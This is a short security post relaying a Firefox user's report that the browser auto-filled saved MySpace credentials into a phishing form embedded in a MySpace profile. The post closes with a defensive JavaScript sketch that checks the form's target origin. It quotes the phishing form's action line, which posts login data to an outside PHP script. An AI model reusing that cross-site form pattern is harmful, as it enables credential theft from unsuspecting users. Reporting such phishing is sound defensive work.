Firefox Password Storage Bug

Cross-Site Forms + Password Manager = Security Failure

A Firefox user reported the following:

I was shocked today to find an in-the-wild phish that uses nothing more than cross-site forms, and also extracts information from the Password Manager!

The underlying method was so obvious that it should have raised multiple warnings. There were none at all.

It was in a MySpace profile that included this tag:

.. form name="2" action="http://membres.lycos.fr/adel88duran/plaguedoctor.php" method="post"…

What followed was a nearly perfect-looking MySpace login form that used simple HTML and absolute positioning.

Not only did Firefox fail to raise a warning, it auto-filled my http://www.myspace.com username and password into this form!! I hope anyone reading this realizes it is a security failure for the browser to auto-fill the membres.lycos.fr form with credentials from another website.

I even confirmed in the password manager that I do not have any passwords saved for the membres.lycos.fr domain.

I realize there is a consideration for cross-site functionality on certain subdomains. However, I must say I am shocked that Firefox lacks a warning for both the POST element and the Password Manager in this case.

I would have been thoroughly fooled by this page were it not for a tiny formatting error that the phisher overlooked and that could have been easily fixed. An unsuspecting user would only have to click the Login button on this legitimate-looking page for the phish to be complete.

This appears to be a huge problem! I look forward to your response.

Read about it at Bugzilla, and delete your Firefox passwords if you have been storing them.
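
The check the report found missing, as an added JavaScript illustration (not Firefox's code and not part of the report): a saved login is filled only when the form's action resolves to the origin the login was saved for. The `savedLogins` record layout, the function names and the profile URL are assumptions made for the example.

```javascript
// Illustration only: a toy login store, not Firefox's password manager.
// Each record keeps the page origin it was saved on and the origin the
// login form submitted to (both field names are assumptions).
const savedLogins = [
  { pageOrigin: "http://www.myspace.com",
    submitOrigin: "http://www.myspace.com",
    username: "constructed-user" },          // constructed sample entry
];

// Resolve a possibly relative URL against a base and return its origin.
function originOf(url, base) {
  try { return new URL(url, base).origin; } catch (e) { return null; }
}

// Behaviour described in the report: only the page's origin is consulted,
// so any form on the page receives the saved credentials.
function pageOnlyDecision(pageUrl, formAction, logins) {
  const pageOrigin = originOf(pageUrl);
  return { fill: logins.some(l => l.pageOrigin === pageOrigin) };
}

// Stricter check: the form's action must also resolve to the origin the
// login was saved for. An empty action submits to the page itself.
function actionAwareDecision(pageUrl, formAction, logins) {
  const pageOrigin = originOf(pageUrl);
  const actionOrigin = originOf(formAction || pageUrl, pageUrl);
  if (!pageOrigin || !actionOrigin) return { fill: false, reason: "unparseable URL" };
  const match = logins.find(
    l => l.pageOrigin === pageOrigin && l.submitOrigin === actionOrigin);
  if (match) return { fill: true, username: match.username };
  return { fill: false,
           reason: "form submits to " + actionOrigin + ", no login saved for that target" };
}

// Constructed profile URL; the form action is the one quoted in the report.
const profilePage = "http://www.myspace.com/constructed-profile";
const crossSiteAction = "http://membres.lycos.fr/adel88duran/plaguedoctor.php";

console.log(pageOnlyDecision(profilePage, crossSiteAction, savedLogins));
console.log(actionAwareDecision(profilePage, crossSiteAction, savedLogins));
console.log(actionAwareDecision(profilePage, "/login", savedLogins));
```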
